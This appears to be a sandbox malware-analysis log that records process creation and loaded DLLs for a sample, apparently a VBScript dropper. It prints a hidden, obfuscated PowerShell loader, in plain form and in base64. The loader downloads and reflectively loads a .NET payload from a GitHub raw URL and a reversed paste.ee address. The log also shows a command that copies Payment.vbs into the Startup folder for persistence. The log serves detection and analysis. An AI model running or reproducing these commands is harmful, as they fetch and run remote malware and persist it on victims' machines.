Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ((('h'+'Rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/No'+'DetectO'+'n/NoDetectOn/refs/heads/main/De'+'tahNoth-'+'V.txth3k; hR'+'fb'+'ase64'+'Content ='+' (Ne'+'w-Object Syste'+'m.N'+'et.Web'+'Client).DownloadStr'+'ing'+'(hR'+'furl); hR'+'fbinar'+'yC'+'ontent = [S'+'y'+'stem.Conver'+'t]:'+':FromBa'+'s'+'e64Str'+'ing(h'+'Rfb'+'a'+'s'+'e64Co'+'ntent'+')'+'; h'+'Rfa'+'ss'+'embly = [Refle'+'ction'+'.Assembly'+']::Load(hRfbinaryContent); [d'+'nlib'+'.IO.Home]::VAI('+'Cut0/O'+'1FKS/d/ee.etsap'+'//:sptth'+'Cut, Cu'+'td'+'esativadoCut,'+' '+'Cu'+'tdesativadoCut, '+'Cutde'+'sativadoCut, Cutd'+'es'+'at'+'iva'+'do'+'Cut,'+' C'+'ut1C'+'ut, CutappidtelCut)') -cREplAcE'Cut',[cHAR]34 -REpLACe ([cHAR]104+[cHAR]82+[cHAR]102),[cHAR]36 -REpLACe([cHAR]104+[cHAR]51+[cHAR]107),[cHAR]39))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe"
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Process created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"
Source: C:\Windows\SysWOW64\convert.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICgoKCdoJysnUmZ1JysncmwgPSBoM2todHRwczonKycvLycrJ3JhJysndy4nKydnaXRodScrJ2J1Jysnc2VyJysnY29udGVuJysndC5jb20nKycvTm8nKydEZXRlY3RPJysnbi9Ob0RldGVjdE9uL3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtJysnVi50eHRoM2s7IGhSJysnZmInKydhc2U2NCcrJ0NvbnRlbnQgPScrJyAoTmUnKyd3LU9iamVjdCBTeXN0ZScrJ20uTicrJ2V0LldlYicrJ0NsaWVudCkuRG93bmxvYWRTdHInKydpbmcnKycoaFInKydmdXJsKTsgaFInKydmYmluYXInKyd5QycrJ29udGVudCA9IFtTJysneScrJ3N0ZW0uQ29udmVyJysndF06JysnOkZyb21CYScrJ3MnKydlNjRTdHInKydpbmcoaCcrJ1JmYicrJ2EnKydzJysnZTY0Q28nKydudGVudCcrJyknKyc7IGgnKydSZmEnKydzcycrJ2VtYmx5ID0gW1JlZmxlJysnY3Rpb24nKycuQXNzZW1ibHknKyddOjpMb2FkKGhSZmJpbmFyeUNvbnRlbnQpOyBbZCcrJ25saWInKycuSU8uSG9tZV06OlZBSSgnKydDdXQwL08nKycxRktTL2QvZWUuZXRzYXAnKycvLzpzcHR0aCcrJ0N1dCwgQ3UnKyd0ZCcrJ2VzYXRpdmFkb0N1dCwnKycgJysnQ3UnKyd0ZGVzYXRpdmFkb0N1dCwgJysnQ3V0ZGUnKydzYXRpdmFkb0N1dCwgQ3V0ZCcrJ2VzJysnYXQnKydpdmEnKydkbycrJ0N1dCwnKycgQycrJ3V0MUMnKyd1dCwgQ3V0YXBwaWR0ZWxDdXQpJykgIC1jUkVwbEFjRSdDdXQnLFtjSEFSXTM0ICAtUkVwTEFDZSAgKFtjSEFSXTEwNCtbY0hBUl04MitbY0hBUl0xMDIpLFtjSEFSXTM2ICAtUkVwTEFDZShbY0hBUl0xMDQrW2NIQVJdNTErW2NIQVJdMTA3KSxbY0hBUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ((('h'+'Rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/No'+'DetectO'+'n/NoDetectOn/refs/heads/main/De'+'tahNoth-'+'V.txth3k; hR'+'fb'+'ase64'+'Content ='+' (Ne'+'w-Object Syste'+'m.N'+'et.Web'+'Client).DownloadStr'+'ing'+'(hR'+'furl); hR'+'fbinar'+'yC'+'ontent = [S'+'y'+'stem.Conver'+'t]:'+':FromBa'+'s'+'e64Str'+'ing(h'+'Rfb'+'a'+'s'+'e64Co'+'ntent'+')'+'; h'+'Rfa'+'ss'+'embly = [Refle'+'ction'+'.Assembly'+']::Load(hRfbinaryContent); [d'+'nlib'+'.IO.Home]::VAI('+'Cut0/O'+'1FKS/d/ee.etsap'+'//:sptth'+'Cut, Cu'+'td'+'esativadoCut,'+' '+'Cu'+'tdesativadoCut, '+'Cutde'+'sativadoCut, Cutd'+'es'+'at'+'iva'+'do'+'Cut,'+' C'+'ut1C'+'ut, CutappidtelCut)') -cREplAcE'Cut',[cHAR]34 -REpLACe ([cHAR]104+[cHAR]82+[cHAR]102),[cHAR]36 -REpLACe([cHAR]104+[cHAR]51+[cHAR]107),[cHAR]39))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe"	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Process created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: scecli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: osuninst.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
